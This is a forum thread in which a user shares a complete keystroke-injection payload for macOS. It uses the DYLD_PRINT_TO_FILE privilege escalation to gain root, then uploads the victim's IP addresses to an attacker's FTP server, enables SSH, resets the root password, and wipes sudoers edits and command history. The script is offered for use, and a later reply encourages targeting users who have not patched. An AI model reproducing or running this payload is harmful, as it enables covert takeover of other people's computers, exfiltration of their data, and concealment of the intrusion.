V3sth4cks153 Posted July 26, 2015 Share Posted July 26, 2015 (edited) Hi everyone ! Following my previous post on an adaptation of the recently discovered DYLD_PRINT_TO_FILE privilege escalation vulnerability, I decided to create a full use of this adaptation. This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac. The payload then activates the ssh daemon, changes the root password to anything you want, and uploads a text file containing both the internal and external IP adresses of the victim to an ftp server of your choice. The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app. The attacker can then SSH or SFTP to the victim machine using the modified root password and the IP adress in the text file. /!\ MAKE SURE TO REPLACE THE FTP SERVER ADRESS, USERNAME AND PASSWORD, AS WELL AS THE NEW ROOT PASSWORD WITH WHAT YOU WANT THEM TO BE ! /!\ I hope you like it ! ********************* USE THIS PAYLOAD AT YOUR OWN RISK ! ********************* Here is the code (also on my GitHub) : REM Author: V3sth4cks153 REM Title: OS X DYLD_PRINT_TO_FILE Root SSH Backdoor REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac. REM The payload then activates the ssh daemon, and changes the root password to anything you want, and uploads a text file containing both the internal and external IP adresses of the victim to an ftp server of your choice. REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app. REM REM /!\ MAKE SURE TO REPLACE THE FTP SERVER ADRESS, USERNAME AND PASSWORD, AS WELL AS THE NEW ROOT PASSWORD WITH WHAT YOU WANT THEM TO BE ! /!\ REM REM ********************* USE THIS AT YOUR OWN RISK ********************* REM REM --------------- OPEN TERMINAL --------------- DELAY 3000 GUI SPACE DELAY 100 STRING Terminal DELAY 500 ENTER DELAY 1000 REM --------------- GO TO HOME DIRECTORY --------------- STRING cd ENTER DELAY 100 REM --------------- ESCALATE PRIVS --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER REM --------------- GET IP AND UPLOAD TO FTP --------------- DELAY 200 STRING curl -s checkip.dyndns.org | sed -e 's/.*Current IP Address: //' -e 's/<.*$//' > ip.txt ENTER DELAY 1200 STRING ifconfig |grep inet >> ip.txt ENTER DELAY 500 STRING ftp SERVER_ADRESS ENTER DELAY 500 STRING USERNAME ENTER DELAY 200 STRING PASSWORD ENTER DELAY 1000 STRING put ip.txt ENTER DELAY 1000 STRING exit ENTER DELAY 500 STRING rm ip.txt ENTER REM --------------- ENABLE SSH --------------- STRING systemsetup -f -setremotelogin on ENTER REM --------------- CHANGE ROOT PASSWORD --------------- STRING passwd ENTER STRING NEW_ROOT_PASSWORD ENTER DELAY 500 STRING NEW_ROOT_PASSWORD ENTER DELAY 1500 REM --------------- CLEANUP --------------- STRING cd ENTER STRING visudo -f /etc/sudoers ENTER DELAY 500 STRING :$d ENTER STRING :w ENTER STRING :x ENTER STRING history -c ENTER DELAY 100 STRING exit ENTER STRING history -c ENTER GUI q Edited July 26, 2015 by V3sth4cks153 Quote Link to comment Share on other sites More sharing options...
V3sth4cks153 Posted August 28, 2015 Author Share Posted August 28, 2015 The vunerability has been patched in 10.10.5 ! Quote Link to comment Share on other sites More sharing options...
Matto Posted August 31, 2015 Share Posted August 31, 2015 Sad news :'-( Quote Link to comment Share on other sites More sharing options...
V3sth4cks153 Posted August 31, 2015 Author Share Posted August 31, 2015 (edited) Sad news :'-( Yeah ! But there still are people who won't update before a long time ! So it's still relevant... Edited August 31, 2015 by V3sth4cks153 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.